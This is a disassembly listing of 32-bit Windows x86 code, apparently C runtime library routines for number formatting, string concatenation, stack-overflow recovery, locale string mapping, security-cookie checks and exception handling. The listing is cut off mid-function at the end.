sub_419891 proc near ; CODE XREF: sub_419999+1E�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42DEB8
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_41DBA4
mov esi, [ebp+arg_8]
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_10]
add eax, esi
push eax
xor eax, eax
cmp [ebp+var_14], 2Dh
setz al
add eax, [ebp+arg_4]
push eax
call sub_41DA73
push 0
push esi
push [ebp+arg_4]
lea eax, [ebp+var_14]
call sub_4197F5
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov eax, [ebp+arg_4]
add esp, 28h
pop esi
call sub_41A026
leave
retn
sub_419891 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4198F9 proc near ; CODE XREF: sub_419999+34�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42DEB8
xor eax, [ebp+4]
push ebx
push esi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_41DBA4
mov esi, [ebp+var_10]
mov ebx, [ebp+arg_8]
xor eax, eax
dec esi
cmp [ebp+var_14], 2Dh
setz al
add eax, [ebp+arg_4]
mov edi, eax
lea eax, [ebp+var_14]
push eax
push ebx
push edi
call sub_41DA73
mov eax, [ebp+var_10]
add esp, 1Ch
dec eax
cmp esi, eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_419975
cmp eax, ebx
jge short loc_419975
test cl, cl
jz short loc_419965
loc_41995B: ; CODE XREF: sub_4198F9+67�j
mov al, [edi]
inc edi
test al, al
jnz short loc_41995B
and [edi-2], al
loc_419965: ; CODE XREF: sub_4198F9+60�j
push 1
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_14]
call sub_4197F5
jmp short loc_419986
; ---------------------------------------------------------------------------
loc_419975: ; CODE XREF: sub_4198F9+58�j
; sub_4198F9+5C�j
push 1
push [ebp+arg_C]
lea eax, [ebp+var_14]
push ebx
mov ebx, [ebp+arg_4]
call sub_4196D3
loc_419986: ; CODE XREF: sub_4198F9+7A�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 0Ch
pop edi
pop esi
pop ebx
call sub_41A026
leave
retn
sub_4198F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419999 proc near ; CODE XREF: sub_416492+43E�p
; DATA XREF: sub_414CF5�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_4199D4
cmp [ebp+arg_8], 45h
jz short loc_4199D4
cmp [ebp+arg_8], 66h
jnz short loc_4199C1
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419891
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4199C1: ; CODE XREF: sub_419999+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4198F9
jmp short loc_4199E5
; ---------------------------------------------------------------------------
loc_4199D4: ; CODE XREF: sub_419999+7�j
; sub_419999+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419781
loc_4199E5: ; CODE XREF: sub_419999+39�j
add esp, 10h
pop ebp
retn
sub_419999 endp
; =============== S U B R O U T I N E =======================================
sub_4199EA proc near ; CODE XREF: sub_414D2D+F�p
push 30000h
push 10000h
call sub_41DD71
pop ecx
pop ecx
retn
sub_4199EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4199FC proc near ; CODE XREF: sub_419A3C:loc_419A60�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_429050
fstp [ebp+var_8]
fld ds:dbl_429048
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp ds:dbl_429040
fnstsw ax
test ah, 41h
jnz short loc_419A38
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_419A38: ; CODE XREF: sub_4199FC+35�j
xor eax, eax
leave
retn
sub_4199FC endp
; =============== S U B R O U T I N E =======================================
sub_419A3C proc near ; CODE XREF: sub_414D2D+5�p
push offset aKernel32 ; "KERNEL32"
call ds:dword_4200A4 ; GetModuleHandleA
test eax, eax
jz short loc_419A60
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:dword_420084 ; GetProcAddress
test eax, eax
jz short loc_419A60
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_419A60: ; CODE XREF: sub_419A3C+D�j
; sub_419A3C+1D�j
jmp sub_4199FC
sub_419A3C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419A70 proc near ; CODE XREF: sub_414F66+F5�p
; sub_4196D3+60�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_419AE5
sub_419A70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419A80 proc near ; CODE XREF: sub_41B3F9+10B�p
; sub_41B3F9+116�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_419AA0
loc_419A8D: ; CODE XREF: sub_419A80+1C�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_419AD3
test ecx, 3
jnz short loc_419A8D
mov edi, edi
loc_419AA0: ; CODE XREF: sub_419A80+B�j
; sub_419A80+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_419AA0
mov eax, [ecx-4]
test al, al
jz short loc_419AE2
test ah, ah
jz short loc_419ADD
test eax, 0FF0000h
jz short loc_419AD8
test eax, 0FF000000h
jz short loc_419AD3
jmp short loc_419AA0
; ---------------------------------------------------------------------------
loc_419AD3: ; CODE XREF: sub_419A80+14�j
; sub_419A80+4F�j
lea edi, [ecx-1]
jmp short loc_419AE5
; ---------------------------------------------------------------------------
loc_419AD8: ; CODE XREF: sub_419A80+48�j
lea edi, [ecx-2]
jmp short loc_419AE5
; ---------------------------------------------------------------------------
loc_419ADD: ; CODE XREF: sub_419A80+41�j
lea edi, [ecx-3]
jmp short loc_419AE5
; ---------------------------------------------------------------------------
loc_419AE2: ; CODE XREF: sub_419A80+3D�j
lea edi, [ecx-4]
loc_419AE5: ; CODE XREF: sub_419A70+5�j
; sub_419A80+56�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_419B0E
loc_419AF1: ; CODE XREF: sub_419A80+85�j
mov dl, [ecx]
add ecx, 1
test dl, dl
jz short loc_419B60
mov [edi], dl
add edi, 1
test ecx, 3
jnz short loc_419AF1
jmp short loc_419B0E
; ---------------------------------------------------------------------------
loc_419B09: ; CODE XREF: sub_419A80+A6�j
; sub_419A80+C0�j
mov [edi], edx
add edi, 4
loc_419B0E: ; CODE XREF: sub_419A80+6F�j
; sub_419A80+87�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_419B09
test dl, dl
jz short loc_419B60
test dh, dh
jz short loc_419B57
test edx, 0FF0000h
jz short loc_419B4A
test edx, 0FF000000h
jz short loc_419B42
jmp short loc_419B09
; ---------------------------------------------------------------------------
loc_419B42: ; CODE XREF: sub_419A80+BE�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_419B4A: ; CODE XREF: sub_419A80+B6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_419B57: ; CODE XREF: sub_419A80+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_419B60: ; CODE XREF: sub_419A80+78�j
; sub_419A80+AA�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_419A80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B68 proc near ; CODE XREF: sub_414F66+A5�p
; sub_416D3B+4DC�p ...
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
push 4
pop eax
call sub_414630
mov ebx, esp
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call ds:dword_42019C ; VirtualQuery
test eax, eax
jz short loc_419BFD
mov edi, [ebp+var_20]
lea eax, [ebp+var_48]
push eax
call ds:dword_420074 ; GetSystemInfo
mov eax, [ebp+var_44]
lea esi, [eax-1]
not esi
and esi, ebx
sub esi, eax
mov [ebp+var_4], eax
mov eax, dword_47C1C4
mov ecx, eax
dec ecx
neg ecx
sbb ecx, ecx
and ecx, 0FFFF1000h
add ecx, 11000h
add ecx, edi
cmp esi, ecx
jb short loc_419BFD
cmp eax, 1
jz short loc_419C15
mov ebx, edi
mov edi, 1000h
loc_419BD2: ; CODE XREF: sub_419B68+81�j
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call ds:dword_42019C ; VirtualQuery
test eax, eax
jz short loc_419BFD
add ebx, [ebp+var_18]
test [ebp+var_14], edi
jz short loc_419BD2
test [ebp+var_F], 1
mov ebx, [ebp+var_24]
jz short loc_419BF9
xor eax, eax
inc eax
jmp short loc_419C31
; ---------------------------------------------------------------------------
loc_419BF9: ; CODE XREF: sub_419B68+8A�j
cmp esi, ebx
jnb short loc_419C01
loc_419BFD: ; CODE XREF: sub_419B68+22�j
; sub_419B68+5C�j ...
xor eax, eax
jmp short loc_419C31
; ---------------------------------------------------------------------------
loc_419C01: ; CODE XREF: sub_419B68+93�j
push 4
push edi
push [ebp+var_4]
push ebx
call ds:dword_420190 ; VirtualAlloc
mov eax, dword_47C1C4
jmp short loc_419C17
; ---------------------------------------------------------------------------
loc_419C15: ; CODE XREF: sub_419B68+61�j
mov ebx, esi
loc_419C17: ; CODE XREF: sub_419B68+AB�j
dec eax
neg eax
sbb eax, eax
and eax, 103h
lea ecx, [ebp+var_8]
push ecx
inc eax
push eax
push [ebp+var_4]
push ebx
call ds:dword_420198 ; VirtualProtect
loc_419C31: ; CODE XREF: sub_419B68+8F�j
; sub_419B68+97�j
lea esp, [ebp-54h]
pop edi
pop esi
pop ebx
leave
retn
sub_419B68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419C39 proc near ; CODE XREF: sub_414F66+6F�p
; sub_414F66+E5�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push 38h
push offset stru_429088
call __SEH_prolog
xor ebx, ebx
cmp dword_47C380, ebx
jnz short loc_419C87
push ebx
push ebx
xor esi, esi
inc esi
push esi
push offset dword_429080
push 100h
push ebx
call ds:dword_4201A4 ; LCMapStringW
test eax, eax
jz short loc_419C72
mov dword_47C380, esi
jmp short loc_419C87
; ---------------------------------------------------------------------------
loc_419C72: ; CODE XREF: sub_419C39+2F�j
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_419C87
mov dword_47C380, 2
loc_419C87: ; CODE XREF: sub_419C39+14�j
; sub_419C39+37�j ...
cmp [ebp+arg_C], ebx
jle short loc_419CA7
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_419C92: ; CODE XREF: sub_419C39+61�j
dec ecx
cmp [eax], bl
jz short loc_419C9F
inc eax
cmp ecx, ebx
jnz short loc_419C92
or ecx, 0FFFFFFFFh
loc_419C9F: ; CODE XREF: sub_419C39+5C�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+arg_C], eax
loc_419CA7: ; CODE XREF: sub_419C39+51�j
mov eax, dword_47C380
cmp eax, 2
jz loc_419E91
cmp eax, ebx
jz loc_419E91
cmp eax, 1
jnz loc_419EC4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], ebx
mov [ebp+var_24], ebx
cmp [ebp+arg_18], ebx
jnz short loc_419CDE
mov eax, dword_47C4F0
mov [ebp+arg_18], eax
loc_419CDE: ; CODE XREF: sub_419C39+9B�j
push ebx
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
xor eax, eax
cmp [ebp+arg_1C], ebx
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call ds:dword_4200D4 ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_28], esi
cmp esi, ebx
jz loc_419EC4
mov [ebp+ms_exc.disabled], 1
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_414630
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_419D4A
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_419B68
xor ebx, ebx
mov [ebp+var_2C], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_419D4A: ; CODE XREF: sub_419C39+F4�j
cmp [ebp+var_2C], ebx
jnz short loc_419D6B
lea eax, [esi+esi]
push eax
call sub_414CAD
pop ecx
mov [ebp+var_2C], eax
cmp eax, ebx
jz loc_419EC4
mov [ebp+var_20], 1
loc_419D6B: ; CODE XREF: sub_419C39+114�j
push esi
push [ebp+var_2C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_4200D4 ; MultiByteToWideChar
test eax, eax
jz loc_419E6E
push ebx
push ebx
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A4 ; LCMapStringW
mov edi, eax
mov [ebp+var_1C], edi
cmp edi, ebx
jz loc_419E6E
test byte ptr [ebp+arg_4+1], 4
jz short loc_419DDA
cmp [ebp+arg_14], ebx
jz loc_419E6E
cmp edi, [ebp+arg_14]
jg loc_419E6E
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A4 ; LCMapStringW
jmp loc_419E6E
; ---------------------------------------------------------------------------
loc_419DDA: ; CODE XREF: sub_419C39+172�j
mov [ebp+ms_exc.disabled], 2
lea eax, [edi+edi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_414630
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_30], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_419E18
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_419B68
xor ebx, ebx
mov [ebp+var_30], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_419E18: ; CODE XREF: sub_419C39+1C2�j
cmp [ebp+var_30], ebx
jnz short loc_419E35
lea eax, [edi+edi]
push eax
call sub_414CAD
pop ecx
mov [ebp+var_30], eax
cmp eax, ebx
jz short loc_419E6E
mov [ebp+var_24], 1
loc_419E35: ; CODE XREF: sub_419C39+1E2�j
push edi
push [ebp+var_30]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A4 ; LCMapStringW
test eax, eax
jz short loc_419E6E
push ebx
push ebx
cmp [ebp+arg_14], ebx
jnz short loc_419E58
push ebx
push ebx
jmp short loc_419E5E
; ---------------------------------------------------------------------------
loc_419E58: ; CODE XREF: sub_419C39+219�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_419E5E: ; CODE XREF: sub_419C39+21D�j
push edi
push [ebp+var_30]
push ebx
push [ebp+arg_18]
call ds:dword_4200D8 ; WideCharToMultiByte
mov edi, eax
loc_419E6E: ; CODE XREF: sub_419C39+149�j
; sub_419C39+168�j ...
cmp [ebp+var_24], ebx
jz short loc_419E7C
push [ebp+var_30]
call sub_414844
pop ecx
loc_419E7C: ; CODE XREF: sub_419C39+238�j
cmp [ebp+var_20], ebx
jz short loc_419E8A
push [ebp+var_2C]
call sub_414844
pop ecx
loc_419E8A: ; CODE XREF: sub_419C39+246�j
mov eax, edi
jmp loc_419FEC
; ---------------------------------------------------------------------------
loc_419E91: ; CODE XREF: sub_419C39+76�j
; sub_419C39+7E�j
mov [ebp+var_34], ebx
xor edi, edi
mov [ebp+var_38], ebx
cmp [ebp+arg_0], ebx
jnz short loc_419EA6
mov eax, dword_47C4E0
mov [ebp+arg_0], eax
loc_419EA6: ; CODE XREF: sub_419C39+263�j
cmp [ebp+arg_18], ebx
jnz short loc_419EB3
mov eax, dword_47C4F0
mov [ebp+arg_18], eax
loc_419EB3: ; CODE XREF: sub_419C39+270�j
push [ebp+arg_0]
call sub_41DD87
pop ecx
mov [ebp+var_3C], eax
cmp eax, 0FFFFFFFFh
jnz short loc_419ECB
loc_419EC4: ; CODE XREF: sub_419C39+87�j
; sub_419C39+CD�j ...
xor eax, eax
jmp loc_419FEC
; ---------------------------------------------------------------------------
loc_419ECB: ; CODE XREF: sub_419C39+289�j
cmp eax, [ebp+arg_18]
jz loc_419FC2
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_41DDD0
add esp, 18h
mov [ebp+var_34], eax
cmp eax, ebx
jz short loc_419EC4
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A0 ; LCMapStringA
mov esi, eax
mov [ebp+var_40], esi
cmp esi, ebx
jz loc_419FB1
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_414630
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_44], edi
push esi
push ebx
push edi
call sub_41C380
add esp, 0Ch
jmp short loc_419F42
; ---------------------------------------------------------------------------
loc_419F32: ; DATA XREF: .rdata:stru_429088�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_419F36: ; DATA XREF: .rdata:stru_429088�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419B68
xor ebx, ebx
xor edi, edi
loc_419F42: ; CODE XREF: sub_419C39+2F7�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
cmp edi, ebx
jnz short loc_419F6D
push [ebp+var_40]
call sub_414CAD
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_419F8A
push [ebp+var_40]
push ebx
push edi
call sub_41C380
add esp, 0Ch
mov [ebp+var_38], 1
loc_419F6D: ; CODE XREF: sub_419C39+30F�j
push [ebp+var_40]
push edi
push [ebp+arg_C]
push [ebp+var_34]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A0 ; LCMapStringA
mov [ebp+var_40], eax
cmp eax, ebx
jnz short loc_419F8E
loc_419F8A: ; CODE XREF: sub_419C39+31E�j
xor esi, esi
jmp short loc_419FB4
; ---------------------------------------------------------------------------
loc_419F8E: ; CODE XREF: sub_419C39+34F�j
push [ebp+arg_14]
push [ebp+arg_10]
lea eax, [ebp+var_40]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_3C]
call sub_41DDD0
add esp, 18h
mov esi, eax
neg esi
sbb esi, esi
neg esi
jmp short loc_419FB4
; ---------------------------------------------------------------------------
loc_419FB1: ; CODE XREF: sub_419C39+2D0�j
mov esi, [ebp+var_48]
loc_419FB4: ; CODE XREF: sub_419C39+353�j
; sub_419C39+376�j
cmp [ebp+var_38], ebx
jz short loc_419FDC
push edi
call sub_414844
pop ecx
jmp short loc_419FDC
; ---------------------------------------------------------------------------
loc_419FC2: ; CODE XREF: sub_419C39+295�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A0 ; LCMapStringA
mov esi, eax
loc_419FDC: ; CODE XREF: sub_419C39+37E�j
; sub_419C39+387�j
cmp [ebp+var_34], ebx
jz short loc_419FEA
push [ebp+var_34]
call sub_414844
pop ecx
loc_419FEA: ; CODE XREF: sub_419C39+3A6�j
mov eax, esi
loc_419FEC: ; CODE XREF: sub_419C39+253�j
; sub_419C39+28D�j
lea esp, [ebp-54h]
call __SEH_epilog
retn
sub_419C39 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41A026
loc_419FF5: ; CODE XREF: sub_41A026:loc_41A02F�j
push 8
push offset stru_4294C0
call __SEH_prolog
and dword ptr [ebp-4], 0
push 0
push 1
call sub_41DFF5
pop ecx
pop ecx
jmp short loc_41A019
; END OF FUNCTION CHUNK FOR sub_41A026
; =============== S U B R O U T I N E =======================================
sub_41A012 proc near ; DATA XREF: .rdata:stru_4294C0�o
xor eax, eax
inc eax
retn
sub_41A012 endp
; ---------------------------------------------------------------------------
loc_41A016: ; DATA XREF: .rdata:stru_4294C0�o
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_41A026
loc_41A019: ; CODE XREF: sub_41A026-16�j
or dword ptr [ebp-4], 0FFFFFFFFh
push 3
call ds:dword_420034 ; ExitProcess
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_41A026
; =============== S U B R O U T I N E =======================================
sub_41A026 proc near ; CODE XREF: sub_415289+B4�p
; sub_416492+76E�p ...
; FUNCTION CHUNK AT 00419FF5 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0041A019 SIZE 0000000D BYTES
cmp ecx, dword_42DEB8
jnz short loc_41A02F
retn
; ---------------------------------------------------------------------------
loc_41A02F: ; CODE XREF: sub_41A026+6�j
jmp loc_419FF5
sub_41A026 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A034 proc near ; CODE XREF: sub_41A61B+138�p
arg_0 = dword ptr 4
mov eax, [esi+4]
test eax, eax
jz short loc_41A07F
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_41A07F
mov ecx, [edi+4]
cmp eax, ecx
jz short loc_41A05A
add ecx, 8
push ecx
push edx
call sub_41C8C0
test eax, eax
pop ecx
pop ecx
jnz short loc_41A07C
loc_41A05A: ; CODE XREF: sub_41A034+14�j
test byte ptr [edi], 2
jz short loc_41A064
test byte ptr [esi], 8
jz short loc_41A07C
loc_41A064: ; CODE XREF: sub_41A034+29�j
mov eax, [esp+arg_0]
mov eax, [eax]
test al, 1
jz short loc_41A073
test byte ptr [esi], 1
jz short loc_41A07C
loc_41A073: ; CODE XREF: sub_41A034+38�j
test al, 2
jz short loc_41A07F
test byte ptr [esi], 2
jnz short loc_41A07F
loc_41A07C: ; CODE XREF: sub_41A034+24�j
; sub_41A034+2E�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41A07F: ; CODE XREF: sub_41A034+5�j
; sub_41A034+D�j ...
xor eax, eax
inc eax
retn
sub_41A034 endp
; =============== S U B R O U T I N E =======================================
sub_41A083 proc near ; CODE XREF: sub_41A0A1+76�p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_41A090
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41A090: ; CODE XREF: sub_41A083+8�j
call sub_416C45
and dword ptr [eax+80h], 0
jmp sub_41A89F
sub_41A083 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A0A1 proc near ; CODE XREF: sub_41A1D1+117�p
; sub_41A4F4+31�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset stru_4294D0
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
call sub_416C45
add eax, 80h
inc dword ptr [eax]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
loc_41A0C9: ; CODE XREF: sub_41A0A1+8F�j
cmp esi, [ebp+arg_C]
jz short loc_41A132
cmp esi, 0FFFFFFFFh
jle short loc_41A0D8
cmp esi, [edi+4]
jl short loc_41A0DD
loc_41A0D8: ; CODE XREF: sub_41A0A1+30�j
call sub_41A8D4
loc_41A0DD: ; CODE XREF: sub_41A0A1+35�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_41A10E
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_41A910
loc_41A10E: ; CODE XREF: sub_41A0A1+56�j
and [ebp+ms_exc.disabled], 0
jmp short loc_41A12D
; ---------------------------------------------------------------------------
loc_41A114: ; DATA XREF: .rdata:004294E0�o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_41A083
retn
; ---------------------------------------------------------------------------
loc_41A11D: ; DATA XREF: .rdata:004294E4�o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_41A12D: ; CODE XREF: sub_41A0A1+71�j
mov [ebp+var_1C], esi
jmp short loc_41A0C9
; ---------------------------------------------------------------------------
loc_41A132: ; CODE XREF: sub_41A0A1+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41A154
cmp esi, [ebp+arg_C]
jz short loc_41A145
call sub_41A8D4
loc_41A145: ; CODE XREF: sub_41A0A1+9D�j
mov [ebx+8], esi
call __SEH_epilog
retn
sub_41A0A1 endp
; =============== S U B R O U T I N E =======================================
sub_41A14E proc near ; DATA XREF: .rdata:stru_4294D0�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_41A14E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A154 proc near ; CODE XREF: sub_41A0A1+95�p
call sub_416C45
cmp dword ptr [eax+80h], 0
jle short locret_41A16E
call sub_416C45
add eax, 80h
dec dword ptr [eax]
locret_41A16E: ; CODE XREF: sub_41A154+C�j
retn
sub_41A154 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A16F proc near ; CODE XREF: sub_41A314+5C�p
; sub_41A61B+1A8�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_4294E8
call __SEH_prolog
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41A19D
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_41A19D
and [ebp+ms_exc.disabled], 0
push ecx
push dword ptr [eax+18h]
call sub_41546C
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41A19D: ; CODE XREF: sub_41A16F+11�j
; sub_41A16F+1B�j
call __SEH_epilog
retn
sub_41A16F endp
; =============== S U B R O U T I N E =======================================
sub_41A1A3 proc near ; DATA XREF: .rdata:stru_4294E8�o
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
sub_41A1A3 endp
; ---------------------------------------------------------------------------
loc_41A1AC: ; DATA XREF: .rdata:stru_4294E8�o
mov esp, [ebp-18h]
jmp sub_41A89F
; =============== S U B R O U T I N E =======================================
sub_41A1B4 proc near ; CODE XREF: sub_41A378+7C�p
; sub_41A378+FB�p ...
mov edx, [ecx+4]
push esi
mov esi, eax
mov eax, [ecx]
add eax, esi
test edx, edx
jl short loc_41A1CF
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41A1CF: ; CODE XREF: sub_41A1B4+C�j
pop esi
retn
sub_41A1B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A1D1 proc near ; CODE XREF: sub_41A4F4+52�p
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
